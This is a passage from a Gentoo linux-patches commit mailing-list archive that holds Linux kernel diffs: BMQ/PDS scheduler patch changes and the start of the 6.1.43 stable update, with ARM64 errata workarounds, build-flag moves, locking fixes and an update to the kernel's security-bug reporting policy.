-+		.procname	= "yield_type",
-+		.data		= &sched_yield_type,
-+		.maxlen		= sizeof (int),
-+		.mode		= 0644,
-+		.proc_handler	= &proc_dointvec_minmax,
-+		.extra1		= SYSCTL_ZERO,
-+		.extra2		= SYSCTL_TWO,
-+	},
-+#endif
- #if defined(CONFIG_S390) && defined(CONFIG_SMP)
- 	{
- 		.procname	= "spin_retry",
-diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
-index 3ae661ab6260..35f0176dcdb0 100644
---- a/kernel/time/hrtimer.c
-+++ b/kernel/time/hrtimer.c
-@@ -2088,8 +2088,10 @@ long hrtimer_nanosleep(ktime_t rqtp, const enum hrtimer_mode mode,
- 	int ret = 0;
- 	u64 slack;
- 
-+#ifndef CONFIG_SCHED_ALT
- 	slack = current->timer_slack_ns;
- 	if (dl_task(current) || rt_task(current))
-+#endif
- 		slack = 0;
- 
- 	hrtimer_init_sleeper_on_stack(&t, clockid, mode);
-diff --git a/kernel/time/posix-cpu-timers.c b/kernel/time/posix-cpu-timers.c
-index cb925e8ef9a8..67d823510f5c 100644
---- a/kernel/time/posix-cpu-timers.c
-+++ b/kernel/time/posix-cpu-timers.c
-@@ -223,7 +223,7 @@ static void task_sample_cputime(struct task_struct *p, u64 *samples)
- 	u64 stime, utime;
- 
- 	task_cputime(p, &utime, &stime);
--	store_samples(samples, stime, utime, p->se.sum_exec_runtime);
-+	store_samples(samples, stime, utime, tsk_seruntime(p));
- }
- 
- static void proc_sample_cputime_atomic(struct task_cputime_atomic *at,
-@@ -866,6 +866,7 @@ static void collect_posix_cputimers(struct posix_cputimers *pct, u64 *samples,
- 	}
- }
- 
-+#ifndef CONFIG_SCHED_ALT
- static inline void check_dl_overrun(struct task_struct *tsk)
- {
- 	if (tsk->dl.dl_overrun) {
-@@ -873,6 +874,7 @@ static inline void check_dl_overrun(struct task_struct *tsk)
- 		send_signal_locked(SIGXCPU, SEND_SIG_PRIV, tsk, PIDTYPE_TGID);
- 	}
- }
-+#endif
- 
- static bool check_rlimit(u64 time, u64 limit, int signo, bool rt, bool hard)
- {
-@@ -900,8 +902,10 @@ static void check_thread_timers(struct task_struct *tsk,
- 	u64 samples[CPUCLOCK_MAX];
- 	unsigned long soft;
- 
-+#ifndef CONFIG_SCHED_ALT
- 	if (dl_task(tsk))
- 		check_dl_overrun(tsk);
-+#endif
- 
- 	if (expiry_cache_is_inactive(pct))
- 		return;
-@@ -915,7 +919,7 @@ static void check_thread_timers(struct task_struct *tsk,
- 	soft = task_rlimit(tsk, RLIMIT_RTTIME);
- 	if (soft != RLIM_INFINITY) {
- 		/* Task RT timeout is accounted in jiffies. RTTIME is usec */
--		unsigned long rttime = tsk->rt.timeout * (USEC_PER_SEC / HZ);
-+		unsigned long rttime = tsk_rttimeout(tsk) * (USEC_PER_SEC / HZ);
- 		unsigned long hard = task_rlimit_max(tsk, RLIMIT_RTTIME);
- 
- 		/* At the hard limit, send SIGKILL. No further action. */
-@@ -1151,8 +1155,10 @@ static inline bool fastpath_timer_check(struct task_struct *tsk)
- 			return true;
- 	}
- 
-+#ifndef CONFIG_SCHED_ALT
- 	if (dl_task(tsk) && tsk->dl.dl_overrun)
- 		return true;
-+#endif
- 
- 	return false;
- }
-diff --git a/kernel/trace/trace_selftest.c b/kernel/trace/trace_selftest.c
-index a2d301f58ced..2ccdede8585c 100644
---- a/kernel/trace/trace_selftest.c
-+++ b/kernel/trace/trace_selftest.c
-@@ -1143,10 +1143,15 @@ static int trace_wakeup_test_thread(void *data)
- {
- 	/* Make this a -deadline thread */
- 	static const struct sched_attr attr = {
-+#ifdef CONFIG_SCHED_ALT
-+		/* No deadline on BMQ/PDS, use RR */
-+		.sched_policy = SCHED_RR,
-+#else
- 		.sched_policy = SCHED_DEADLINE,
- 		.sched_runtime = 100000ULL,
- 		.sched_deadline = 10000000ULL,
- 		.sched_period = 10000000ULL
-+#endif
- 	};
- 	struct wakeup_test_data *x = data;
- 

diff --git a/5021_BMQ-and-PDS-gentoo-defaults.patch b/5021_BMQ-and-PDS-gentoo-defaults.patch
deleted file mode 100644
index 6dc48eec..00000000
--- a/5021_BMQ-and-PDS-gentoo-defaults.patch
+++ /dev/null
@@ -1,13 +0,0 @@
---- a/init/Kconfig	2023-02-13 08:16:09.534315265 -0500
-+++ b/init/Kconfig	2023-02-13 08:17:24.130237204 -0500
-@@ -867,8 +867,9 @@ config UCLAMP_BUCKETS_COUNT
- 	  If in doubt, use the default value.
- 
- menuconfig SCHED_ALT
-+	depends on X86_64
- 	bool "Alternative CPU Schedulers"
--	default y
-+	default n
- 	help
- 	  This feature enable alternative CPU scheduler"
- 

diff --git a/5022_BMQ-and-PDS-remove-psi-support.patch b/5022_BMQ-and-PDS-remove-psi-support.patch
deleted file mode 100644
index 4390e2d5..00000000
--- a/5022_BMQ-and-PDS-remove-psi-support.patch
+++ /dev/null
@@ -1,94 +0,0 @@
-From 542887ccaeadc65843ec171bccc87f8aa8bbca95 Mon Sep 17 00:00:00 2001
-From: Alfred Chen <cchalpha@gmail.com>
-Date: Wed, 26 Apr 2023 16:38:14 +0000
-Subject: [PATCH] sched/alt: Remove psi support
-
-There are issues(#70, #72, #79) with psi support. Removing the
-support of psi as it doesn't bring much gain.
----
- init/Kconfig             | 1 +
- kernel/sched/alt_core.c  | 8 --------
- kernel/sched/alt_sched.h | 1 -
- 3 files changed, 1 insertion(+), 9 deletions(-)
-
-diff --git a/init/Kconfig b/init/Kconfig
-index 454f792df9dd..dff86592555a 100644
---- a/init/Kconfig
-+++ b/init/Kconfig
-@@ -629,6 +629,7 @@ config TASK_IO_ACCOUNTING
- 
- config PSI
- 	bool "Pressure stall information tracking"
-+	depends on !SCHED_ALT
- 	help
- 	  Collect metrics that indicate how overcommitted the CPU, memory,
- 	  and IO capacity are in the system.
-diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
-index af4d840d4bb7..37dfdc41d2a7 100644
---- a/kernel/sched/alt_core.c
-+++ b/kernel/sched/alt_core.c
-@@ -588,7 +588,6 @@ static void update_rq_clock_task(struct rq *rq, s64 delta)
- 
- 	rq->prev_irq_time += irq_delta;
- 	delta -= irq_delta;
--	psi_account_irqtime(rq->curr, irq_delta);
- #endif
- #ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
- 	if (static_key_false((&paravirt_steal_rq_enabled))) {
-@@ -769,7 +768,6 @@ unsigned long get_wchan(struct task_struct *p)
-  */
- #define __SCHED_DEQUEUE_TASK(p, rq, flags, func)				\
- 	sched_info_dequeue(rq, p);						\
--	psi_dequeue(p, flags & DEQUEUE_SLEEP);					\
- 										\
- 	list_del(&p->sq_node);							\
- 	if (list_empty(&rq->queue.heads[p->sq_idx])) { 				\
-@@ -779,7 +777,6 @@ unsigned long get_wchan(struct task_struct *p)
- 
- #define __SCHED_ENQUEUE_TASK(p, rq, flags)				\
- 	sched_info_enqueue(rq, p);					\
--	psi_enqueue(p, flags & ENQUEUE_WAKEUP);				\
- 									\
- 	p->sq_idx = task_sched_prio_idx(p, rq);				\
- 	list_add_tail(&p->sq_node, &rq->queue.heads[p->sq_idx]);	\
-@@ -2954,7 +2951,6 @@ static int try_to_wake_up(struct task_struct *p, unsigned int state,
- 		}
- 
- 		wake_flags |= WF_MIGRATED;
--		psi_ttwu_dequeue(p);
- 		set_task_cpu(p, cpu);
- 	}
- #else
-@@ -4828,8 +4824,6 @@ static void __sched notrace __schedule(unsigned int sched_mode)
- 		 */
- 		++*switch_count;
- 
--		psi_sched_switch(prev, next, !task_on_rq_queued(prev));
--
- 		trace_sched_switch(sched_mode & SM_MASK_PREEMPT, prev, next, prev_state);
- 
- 		/* Also unlocks the rq: */
-@@ -7689,8 +7683,6 @@ void __init sched_init(void)
- 	sched_init_topology_cpumask_early();
- #endif /* SMP */
- 
--	psi_init();
--
- 	preempt_dynamic_init();
- }
- 
-diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
-index 9fe45bf0cedf..55a15b806e87 100644
---- a/kernel/sched/alt_sched.h
-+++ b/kernel/sched/alt_sched.h
-@@ -3,7 +3,6 @@
- 
- #include <linux/context_tracking.h>
- #include <linux/profile.h>
--#include <linux/psi.h>
- #include <linux/stop_machine.h>
- #include <linux/syscalls.h>
- #include <linux/tick.h>
--- 
-GitLab
-


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-08-03 11:48 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-08-03 11:48 UTC (permalink / raw
  To: gentoo-commits

commit:     63f745d3bfaa0f9081cd6dcc923f9a1e63a5b6be
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Aug  3 11:48:10 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Aug  3 11:48:10 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=63f745d3

Linux patch 6.1.43

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1042_linux-6.1.43.patch | 11447 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 11451 insertions(+)

diff --git a/0000_README b/0000_README
index e4fa9ccf..a70a1aed 100644
--- a/0000_README
+++ b/0000_README
@@ -211,6 +211,10 @@ Patch:  1041_linux-6.1.42.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.42
 
+Patch:  1042_linux-6.1.43.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.43
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1042_linux-6.1.43.patch b/1042_linux-6.1.43.patch
new file mode 100644
index 00000000..e3d49117
--- /dev/null
+++ b/1042_linux-6.1.43.patch
@@ -0,0 +1,11447 @@
+diff --git a/Documentation/ABI/testing/sysfs-module b/Documentation/ABI/testing/sysfs-module
+index 08886367d0470..62addab47d0c5 100644
+--- a/Documentation/ABI/testing/sysfs-module
++++ b/Documentation/ABI/testing/sysfs-module
+@@ -60,3 +60,14 @@ Description:	Module taint flags:
+ 			C   staging driver module
+ 			E   unsigned module
+ 			==  =====================
++
++What:		/sys/module/grant_table/parameters/free_per_iteration
++Date:		July 2023
++KernelVersion:	6.5 but backported to all supported stable branches
++Contact:	Xen developer discussion <xen-devel@lists.xenproject.org>
++Description:	Read and write number of grant entries to attempt to free per iteration.
++
++		Note: Future versions of Xen and Linux may provide a better
++		interface for controlling the rate of deferred grant reclaim
++		or may not need it at all.
++Users:		Qubes OS (https://www.qubes-os.org)
+diff --git a/Documentation/admin-guide/security-bugs.rst b/Documentation/admin-guide/security-bugs.rst
+index 82e29837d5898..5a6993795bd26 100644
+--- a/Documentation/admin-guide/security-bugs.rst
++++ b/Documentation/admin-guide/security-bugs.rst
+@@ -63,31 +63,28 @@ information submitted to the security list and any followup discussions
+ of the report are treated confidentially even after the embargo has been
+ lifted, in perpetuity.
+ 
+-Coordination
+-------------
+-
+-Fixes for sensitive bugs, such as those that might lead to privilege
+-escalations, may need to be coordinated with the private
+-<linux-distros@vs.openwall.org> mailing list so that distribution vendors
+-are well prepared to issue a fixed kernel upon public disclosure of the
+-upstream fix. Distros will need some time to test the proposed patch and
+-will generally request at least a few days of embargo, and vendor update
+-publication prefers to happen Tuesday through Thursday. When appropriate,
+-the security team can assist with this coordination, or the reporter can
+-include linux-distros from the start. In this case, remember to prefix
+-the email Subject line with "[vs]" as described in the linux-distros wiki:
+-<http://oss-security.openwall.org/wiki/mailing-lists/distros#how-to-use-the-lists>
++Coordination with other groups
++------------------------------
++
++The kernel security team strongly recommends that reporters of potential
++security issues NEVER contact the "linux-distros" mailing list until
++AFTER discussing it with the kernel security team.  Do not Cc: both
++lists at once.  You may contact the linux-distros mailing list after a
++fix has been agreed on and you fully understand the requirements that
++doing so will impose on you and the kernel community.
++
++The different lists have different goals and the linux-distros rules do
++not contribute to actually fixing any potential security problems.
+ 
+ CVE assignment
+ --------------
+ 
+-The security team does not normally assign CVEs, nor do we require them
+-for reports or fixes, as this can needlessly complicate the process and
+-may delay the bug handling. If a reporter wishes to have a CVE identifier
+-assigned ahead of public disclosure, they will need to contact the private
+-linux-distros list, described above. When such a CVE identifier is known
+-before a patch is provided, it is desirable to mention it in the commit
+-message if the reporter agrees.
++The security team does not assign CVEs, nor do we require them for
++reports or fixes, as this can needlessly complicate the process and may
++delay the bug handling.  If a reporter wishes to have a CVE identifier
++assigned, they should find one by themselves, for example by contacting
++MITRE directly.  However under no circumstances will a patch inclusion
++be delayed to wait for a CVE identifier to arrive.
+ 
+ Non-disclosure agreements
+ -------------------------
+diff --git a/Documentation/arm64/silicon-errata.rst b/Documentation/arm64/silicon-errata.rst
+index 55492fea44276..bbc80eff03f98 100644
+--- a/Documentation/arm64/silicon-errata.rst
++++ b/Documentation/arm64/silicon-errata.rst
+@@ -52,6 +52,9 @@ stable kernels.
+ | Allwinner      | A64/R18         | UNKNOWN1        | SUN50I_ERRATUM_UNKNOWN1     |
+ +----------------+-----------------+-----------------+-----------------------------+
+ +----------------+-----------------+-----------------+-----------------------------+
++| Ampere         | AmpereOne       | AC03_CPU_38     | AMPERE_ERRATUM_AC03_CPU_38  |
+++----------------+-----------------+-----------------+-----------------------------+
+++----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Cortex-A510     | #2457168        | ARM64_ERRATUM_2457168       |
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Cortex-A510     | #2064142        | ARM64_ERRATUM_2064142       |
+diff --git a/Documentation/trace/kprobetrace.rst b/Documentation/trace/kprobetrace.rst
+index 4274cc6a2f94f..08a2a6a3782f0 100644
+--- a/Documentation/trace/kprobetrace.rst
++++ b/Documentation/trace/kprobetrace.rst
+@@ -58,8 +58,8 @@ Synopsis of kprobe_events
+   NAME=FETCHARG : Set NAME as the argument name of FETCHARG.
+   FETCHARG:TYPE : Set TYPE as the type of FETCHARG. Currently, basic types
+ 		  (u8/u16/u32/u64/s8/s16/s32/s64), hexadecimal types
+-		  (x8/x16/x32/x64), "string", "ustring" and bitfield
+-		  are supported.
++		  (x8/x16/x32/x64), "string", "ustring", "symbol", "symstr"
++                  and bitfield are supported.
+ 
+   (\*1) only for the probe on function entry (offs == 0).
+   (\*2) only for return probe.
+@@ -96,6 +96,10 @@ offset, and container-size (usually 32). The syntax is::
+ 
+ Symbol type('symbol') is an alias of u32 or u64 type (depends on BITS_PER_LONG)
+ which shows given pointer in "symbol+offset" style.
++On the other hand, symbol-string type ('symstr') converts the given address to
++"symbol+offset/symbolsize" style and stores it as a null-terminated string.
++With 'symstr' type, you can filter the event with wildcard pattern of the
++symbols, and you don't need to solve symbol name by yourself.
+ For $comm, the default type is "string"; any other type is invalid.
+ 
+ .. _user_mem_access:
+diff --git a/Makefile b/Makefile
+index b569bed800521..69cdd0d2946c3 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 42
++SUBLEVEL = 43
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/Kconfig b/arch/arm64/Kconfig
+index 20ee745c118ae..d5eb2fbab473e 100644
+--- a/arch/arm64/Kconfig
++++ b/arch/arm64/Kconfig
+@@ -376,6 +376,25 @@ menu "Kernel Features"
+ 
+ menu "ARM errata workarounds via the alternatives framework"
+ 
++config AMPERE_ERRATUM_AC03_CPU_38
++        bool "AmpereOne: AC03_CPU_38: Certain bits in the Virtualization Translation Control Register and Translation Control Registers do not follow RES0 semantics"
++	default y
++	help
++	  This option adds an alternative code sequence to work around Ampere
++	  erratum AC03_CPU_38 on AmpereOne.
++
++	  The affected design reports FEAT_HAFDBS as not implemented in
++	  ID_AA64MMFR1_EL1.HAFDBS, but (V)TCR_ELx.{HA,HD} are not RES0
++	  as required by the architecture. The unadvertised HAFDBS
++	  implementation suffers from an additional erratum where hardware
++	  A/D updates can occur after a PTE has been marked invalid.
++
++	  The workaround forces KVM to explicitly set VTCR_EL2.HA to 0,
++	  which avoids enabling unadvertised hardware Access Flag management
++	  at stage-2.
++
++	  If unsure, say Y.
++
+ config ARM64_WORKAROUND_CLEAN_CACHE
+ 	bool
+ 
+diff --git a/arch/arm64/kernel/cpu_errata.c b/arch/arm64/kernel/cpu_errata.c
+index 89ac00084f38a..8dbf3c21ea22a 100644
+--- a/arch/arm64/kernel/cpu_errata.c
++++ b/arch/arm64/kernel/cpu_errata.c
+@@ -722,6 +722,13 @@ const struct arm64_cpu_capabilities arm64_errata[] = {
+ 		MIDR_FIXED(MIDR_CPU_VAR_REV(1,1), BIT(25)),
+ 		.cpu_enable = cpu_clear_bf16_from_user_emulation,
+ 	},
++#endif
++#ifdef CONFIG_AMPERE_ERRATUM_AC03_CPU_38
++	{
++		.desc = "AmpereOne erratum AC03_CPU_38",
++		.capability = ARM64_WORKAROUND_AMPERE_AC03_CPU_38,
++		ERRATA_MIDR_ALL_VERSIONS(MIDR_AMPERE1),
++	},
+ #endif
+ 	{
+ 	}
+diff --git a/arch/arm64/kernel/fpsimd.c b/arch/arm64/kernel/fpsimd.c
+index 656f613bacf7a..59aaf2e688336 100644
+--- a/arch/arm64/kernel/fpsimd.c
++++ b/arch/arm64/kernel/fpsimd.c
+@@ -871,6 +871,8 @@ int vec_set_vector_length(struct task_struct *task, enum vec_type type,
+ 	if (task == current)
+ 		put_cpu_fpsimd_context();
+ 
++	task_set_vl(task, type, vl);
++
+ 	/*
+ 	 * Free the changed states if they are not in use, SME will be
+ 	 * reallocated to the correct size on next use and we just
+@@ -885,8 +887,6 @@ int vec_set_vector_length(struct task_struct *task, enum vec_type type,
+ 	if (free_sme)
+ 		sme_free(task);
+ 
+-	task_set_vl(task, type, vl);
+-
+ out:
+ 	update_tsk_thread_flag(task, vec_vl_inherit_flag(type),
+ 			       flags & PR_SVE_VL_INHERIT);
+diff --git a/arch/arm64/kvm/hyp/pgtable.c b/arch/arm64/kvm/hyp/pgtable.c
+index cdf8e76b0be14..ae5f6b5ac80fd 100644
+--- a/arch/arm64/kvm/hyp/pgtable.c
++++ b/arch/arm64/kvm/hyp/pgtable.c
+@@ -595,12 +595,22 @@ u64 kvm_get_vtcr(u64 mmfr0, u64 mmfr1, u32 phys_shift)
+ 		lvls = 2;
+ 	vtcr |= VTCR_EL2_LVLS_TO_SL0(lvls);
+ 
++#ifdef CONFIG_ARM64_HW_AFDBM
+ 	/*
+ 	 * Enable the Hardware Access Flag management, unconditionally
+-	 * on all CPUs. The features is RES0 on CPUs without the support
+-	 * and must be ignored by the CPUs.
++	 * on all CPUs. In systems that have asymmetric support for the feature
++	 * this allows KVM to leverage hardware support on the subset of cores
++	 * that implement the feature.
++	 *
++	 * The architecture requires VTCR_EL2.HA to be RES0 (thus ignored by
++	 * hardware) on implementations that do not advertise support for the
++	 * feature. As such, setting HA unconditionally is safe, unless you
++	 * happen to be running on a design that has unadvertised support for
++	 * HAFDBS. Here be dragons.
+ 	 */
+-	vtcr |= VTCR_EL2_HA;
++	if (!cpus_have_final_cap(ARM64_WORKAROUND_AMPERE_AC03_CPU_38))
++		vtcr |= VTCR_EL2_HA;
++#endif /* CONFIG_ARM64_HW_AFDBM */
+ 
+ 	/* Set the vmid bits */
+ 	vtcr |= (get_vmid_bits(mmfr1) == 16) ?
+diff --git a/arch/arm64/tools/cpucaps b/arch/arm64/tools/cpucaps
+index f1c0347ec31a8..14d31d1b2ff02 100644
+--- a/arch/arm64/tools/cpucaps
++++ b/arch/arm64/tools/cpucaps
+@@ -71,6 +71,7 @@ WORKAROUND_2064142
+ WORKAROUND_2077057
+ WORKAROUND_2457168
+ WORKAROUND_2658417
++WORKAROUND_AMPERE_AC03_CPU_38
+ WORKAROUND_TRBE_OVERWRITE_FILL_MODE
+ WORKAROUND_TSB_FLUSH_FAILURE
+ WORKAROUND_TRBE_WRITE_OUT_OF_RANGE
+diff --git a/arch/loongarch/Kconfig b/arch/loongarch/Kconfig
+index 51d738ac12e55..e737dc8cd660c 100644
+--- a/arch/loongarch/Kconfig
++++ b/arch/loongarch/Kconfig
+@@ -10,6 +10,7 @@ config LOONGARCH
+ 	select ARCH_ENABLE_MEMORY_HOTPLUG
+ 	select ARCH_ENABLE_MEMORY_HOTREMOVE
+ 	select ARCH_HAS_ACPI_TABLE_UPGRADE	if ACPI
++	select ARCH_HAS_NON_OVERLAPPING_ADDRESS_SPACE
+ 	select ARCH_HAS_PTE_SPECIAL
+ 	select ARCH_HAS_TICK_BROADCAST if GENERIC_CLOCKEVENTS_BROADCAST
+ 	select ARCH_INLINE_READ_LOCK if !PREEMPTION
+diff --git a/arch/loongarch/net/bpf_jit.h b/arch/loongarch/net/bpf_jit.h
+index 093885539e701..684b22f54ccc6 100644
+--- a/arch/loongarch/net/bpf_jit.h
++++ b/arch/loongarch/net/bpf_jit.h
+@@ -148,7 +148,7 @@ static inline void move_imm(struct jit_ctx *ctx, enum loongarch_gpr rd, long imm
+ 			 * no need to call lu32id to do a new filled operation.
+ 			 */
+ 			imm_51_31 = (imm >> 31) & 0x1fffff;
+-			if (imm_51_31 != 0 || imm_51_31 != 0x1fffff) {
++			if (imm_51_31 != 0 && imm_51_31 != 0x1fffff) {
+ 				/* lu32id rd, imm_51_32 */
+ 				imm_51_32 = (imm >> 32) & 0xfffff;
+ 				emit_insn(ctx, lu32id, rd, imm_51_32);
+diff --git a/arch/mips/Makefile b/arch/mips/Makefile
+index 85d3c3b4b7bdc..fe64ad43ba882 100644
+--- a/arch/mips/Makefile
++++ b/arch/mips/Makefile
+@@ -190,9 +190,43 @@ endif
+ cflags-$(CONFIG_CAVIUM_CN63XXP1) += -Wa,-mfix-cn63xxp1
+ cflags-$(CONFIG_CPU_BMIPS)	+= -march=mips32 -Wa,-mips32 -Wa,--trap
+ 
++cflags-$(CONFIG_CPU_LOONGSON2E) += $(call cc-option,-march=loongson2e) -Wa,--trap
++cflags-$(CONFIG_CPU_LOONGSON2F) += $(call cc-option,-march=loongson2f) -Wa,--trap
++cflags-$(CONFIG_CPU_LOONGSON64) += $(call cc-option,-march=loongson3a,-march=mips64r2) -Wa,--trap
++# Some -march= flags enable MMI instructions, and GCC complains about that
++# support being enabled alongside -msoft-float. Thus explicitly disable MMI.
++cflags-$(CONFIG_CPU_LOONGSON2EF) += $(call cc-option,-mno-loongson-mmi)
++cflags-$(CONFIG_CPU_LOONGSON64) += $(call cc-option,-mno-loongson-mmi)
++
+ cflags-$(CONFIG_CPU_R4000_WORKAROUNDS)	+= $(call cc-option,-mfix-r4000,)
+ cflags-$(CONFIG_CPU_R4400_WORKAROUNDS)	+= $(call cc-option,-mfix-r4400,)
+ cflags-$(CONFIG_CPU_DADDI_WORKAROUNDS)	+= $(call cc-option,-mno-daddi,)
++ifdef CONFIG_CPU_LOONGSON2F_WORKAROUNDS
++cflags-$(CONFIG_CPU_NOP_WORKAROUNDS) += -Wa,-mfix-loongson2f-nop
++cflags-$(CONFIG_CPU_JUMP_WORKAROUNDS) += -Wa,-mfix-loongson2f-jump
++endif
++
++#
++# Some versions of binutils, not currently mainline as of 2019/02/04, support
++# an -mfix-loongson3-llsc flag which emits a sync prior to each ll instruction
++# to work around a CPU bug (see __SYNC_loongson3_war in asm/sync.h for a
++# description).
++#
++# We disable this in order to prevent the assembler meddling with the
++# instruction that labels refer to, ie. if we label an ll instruction:
++#
++# 1: ll v0, 0(a0)
++#
++# ...then with the assembler fix applied the label may actually point at a sync
++# instruction inserted by the assembler, and if we were using the label in an
++# exception table the table would no longer contain the address of the ll
++# instruction.
++#
++# Avoid this by explicitly disabling that assembler behaviour. If upstream
++# binutils does not merge support for the flag then we can revisit & remove
++# this later - for now it ensures vendor toolchains don't cause problems.
++#
++cflags-$(CONFIG_CPU_LOONGSON64)	+= $(call as-option,-Wa$(comma)-mno-fix-loongson3-llsc,)
+ 
+ # For smartmips configurations, there are hundreds of warnings due to ISA overrides
+ # in assembly and header files. smartmips is only supported for MIPS32r1 onwards
+diff --git a/arch/mips/loongson2ef/Platform b/arch/mips/loongson2ef/Platform
+index c6f7a4b959978..d446b705fba47 100644
+--- a/arch/mips/loongson2ef/Platform
++++ b/arch/mips/loongson2ef/Platform
+@@ -2,41 +2,6 @@
+ # Loongson Processors' Support
+ #
+ 
+-cflags-$(CONFIG_CPU_LOONGSON2EF)	+= -Wa,--trap
+-cflags-$(CONFIG_CPU_LOONGSON2E) += -march=loongson2e
+-cflags-$(CONFIG_CPU_LOONGSON2F) += -march=loongson2f
+-#
+-# Some versions of binutils, not currently mainline as of 2019/02/04, support
+-# an -mfix-loongson3-llsc flag which emits a sync prior to each ll instruction
+-# to work around a CPU bug (see __SYNC_loongson3_war in asm/sync.h for a
+-# description).
+-#
+-# We disable this in order to prevent the assembler meddling with the
+-# instruction that labels refer to, ie. if we label an ll instruction:
+-#
+-# 1: ll v0, 0(a0)
+-#
+-# ...then with the assembler fix applied the label may actually point at a sync
+-# instruction inserted by the assembler, and if we were using the label in an
+-# exception table the table would no longer contain the address of the ll
+-# instruction.
+-#
+-# Avoid this by explicitly disabling that assembler behaviour. If upstream
+-# binutils does not merge support for the flag then we can revisit & remove
+-# this later - for now it ensures vendor toolchains don't cause problems.
+-#
+-cflags-$(CONFIG_CPU_LOONGSON2EF)	+= $(call cc-option,-Wa$(comma)-mno-fix-loongson3-llsc,)
+-
+-# Enable the workarounds for Loongson2f
+-ifdef CONFIG_CPU_LOONGSON2F_WORKAROUNDS
+-cflags-$(CONFIG_CPU_NOP_WORKAROUNDS) += -Wa,-mfix-loongson2f-nop
+-cflags-$(CONFIG_CPU_JUMP_WORKAROUNDS) += -Wa,-mfix-loongson2f-jump
+-endif
+-
+-# Some -march= flags enable MMI instructions, and GCC complains about that
+-# support being enabled alongside -msoft-float. Thus explicitly disable MMI.
+-cflags-y += $(call cc-option,-mno-loongson-mmi)
+-
+ #
+ # Loongson Machines' Support
+ #
+diff --git a/arch/mips/loongson64/Platform b/arch/mips/loongson64/Platform
+index 473404cae1c44..49c9889e3d563 100644
+--- a/arch/mips/loongson64/Platform
++++ b/arch/mips/loongson64/Platform
+@@ -1,19 +1,3 @@
+-#
+-# Loongson Processors' Support
+-#
+-
+-
+-cflags-$(CONFIG_CPU_LOONGSON64)	+= -Wa,--trap
+-
+-ifdef CONFIG_CPU_LOONGSON64
+-cflags-$(CONFIG_CC_IS_GCC) += -march=loongson3a
+-cflags-$(CONFIG_CC_IS_CLANG) += -march=mips64r2
+-endif
+-
+-# Some -march= flags enable MMI instructions, and GCC complains about that
+-# support being enabled alongside -msoft-float. Thus explicitly disable MMI.
+-cflags-y += $(call cc-option,-mno-loongson-mmi)
+-
+ #
+ # Loongson Machines' Support
+ #
+diff --git a/arch/powerpc/platforms/pseries/vas.c b/arch/powerpc/platforms/pseries/vas.c
+index 880b962afc057..041a25c08066b 100644
+--- a/arch/powerpc/platforms/pseries/vas.c
++++ b/arch/powerpc/platforms/pseries/vas.c
+@@ -744,6 +744,12 @@ static int reconfig_close_windows(struct vas_caps *vcap, int excess_creds,
+ 		}
+ 
+ 		task_ref = &win->vas_win.task_ref;
++		/*
++		 * VAS mmap (coproc_mmap()) and its fault handler
++		 * (vas_mmap_fault()) are called after holding mmap lock.
++		 * So hold mmap mutex after mmap_lock to avoid deadlock.
++		 */
++		mmap_write_lock(task_ref->mm);
+ 		mutex_lock(&task_ref->mmap_mutex);
+ 		vma = task_ref->vma;
+ 		/*
+@@ -752,7 +758,6 @@ static int reconfig_close_windows(struct vas_caps *vcap, int excess_creds,
+ 		 */
+ 		win->vas_win.status |= flag;
+ 
+-		mmap_write_lock(task_ref->mm);
+ 		/*
+ 		 * vma is set in the original mapping. But this mapping
+ 		 * is done with mmap() after the window is opened with ioctl.
+@@ -763,8 +768,8 @@ static int reconfig_close_windows(struct vas_caps *vcap, int excess_creds,
+ 			zap_page_range(vma, vma->vm_start,
+ 					vma->vm_end - vma->vm_start);
+ 
+-		mmap_write_unlock(task_ref->mm);
+ 		mutex_unlock(&task_ref->mmap_mutex);
++		mmap_write_unlock(task_ref->mm);
+ 		/*
+ 		 * Close VAS window in the hypervisor, but do not
+ 		 * free vas_window struct since it may be reused
+diff --git a/arch/s390/mm/gmap.c b/arch/s390/mm/gmap.c
+index 02d15c8dc92e9..243f673fa6515 100644
+--- a/arch/s390/mm/gmap.c
++++ b/arch/s390/mm/gmap.c
+@@ -2843,6 +2843,7 @@ int s390_replace_asce(struct gmap *gmap)
+ 	page = alloc_pages(GFP_KERNEL_ACCOUNT, CRST_ALLOC_ORDER);
+ 	if (!page)
+ 		return -ENOMEM;
++	page->index = 0;
+ 	table = page_to_virt(page);
+ 	memcpy(table, gmap->table, 1UL << (CRST_ALLOC_ORDER + PAGE_SHIFT));
+ 
+diff --git a/arch/um/os-Linux/sigio.c b/arch/um/os-Linux/sigio.c
+index 37d60e72cf269..9e71794839e87 100644
+--- a/arch/um/os-Linux/sigio.c
++++ b/arch/um/os-Linux/sigio.c
+@@ -3,7 +3,6 @@
+  * Copyright (C) 2002 - 2008 Jeff Dike (jdike@{addtoit,linux.intel}.com)
+  */
+ 
+-#include <linux/minmax.h>
+ #include <unistd.h>
+ #include <errno.h>
+ #include <fcntl.h>
+@@ -51,7 +50,7 @@ static struct pollfds all_sigio_fds;
+ 
+ static int write_sigio_thread(void *unused)
+ {
+-	struct pollfds *fds;
++	struct pollfds *fds, tmp;
+ 	struct pollfd *p;
+ 	int i, n, respond_fd;
+ 	char c;
